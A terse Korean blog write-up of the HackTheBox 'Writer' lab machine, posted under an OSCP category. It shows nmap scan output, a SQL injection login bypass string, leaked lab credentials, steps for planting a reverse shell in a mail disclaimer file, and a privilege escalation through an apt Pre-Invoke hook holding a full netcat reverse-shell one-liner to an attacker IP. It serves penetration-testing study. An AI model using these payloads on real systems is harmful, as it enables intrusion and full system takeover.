1. INFO GATHERING
┌──(takudaddy㉿kali)-[~/htb]
└─$ sudo nmap -sC -sV -O -p- 10.129.104.70
[sudo] password for takudaddy:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 22:43 EDT
Nmap scan report for 10.129.104.70
Host is up (0.25s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Aggressive OS guesses: Linux 3.7 (92%), Linux 4.8 (91%), Sony X75CH-series Android TV (Android 5.0) (90%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.2 - 4.9 (90%), QNAP QTS 4.0 - 4.2 (90%), Linux 2.6.32 - 3.10 (90%), Linux 2.6.32 - 3.9 (90%), Linux 4.15 - 5.6 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-04T03:10:51
|_ start_date: N/A
2. EXPLOITATION & GETTING INITIAL SHELL
User : kyle / john
SSH Bruteforce
-- RABBIT HOLE--
admin@writer.htb
'or 1=1 -- -
kyle | marcoantonio
dev
djangouser
DjangoSuperPassword
-- 여기까지 Rabbit Hole --
3. GET JOHN"S SHELL
Check disclaimer
filter group 소속
kyle 유저도 filter에 소속
Modify disclaimer : 리버스 쉘 CMD 삽입
create python script
리스너 기동 후
파일 복사 및 스크립트 실행
authorized 키로 등록해 ssh로 붙자
* id 명령어로 해당 유저가 어느 그룹에 속해 있는지 확인하는 것은 굉장히 중요
4. PRIVILEGE ESCALATION
apt 폴더를 사용하면 된다.
https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 443 >/tmp/f"};' > pwn
리스너 기동
잠시 대기하면...
728x90
반응형
'OSCP > HacktheBox' 카테고리의 다른 글
| 19. Previse (14) | 2021.08.11 |
|---|---|
| 17. Archtype (0) | 2021.08.03 |
| 16. Love (0) | 2021.07.21 |
| 15. Armageddon (0) | 2021.07.20 |
| 14. Node (0) | 2021.04.24 |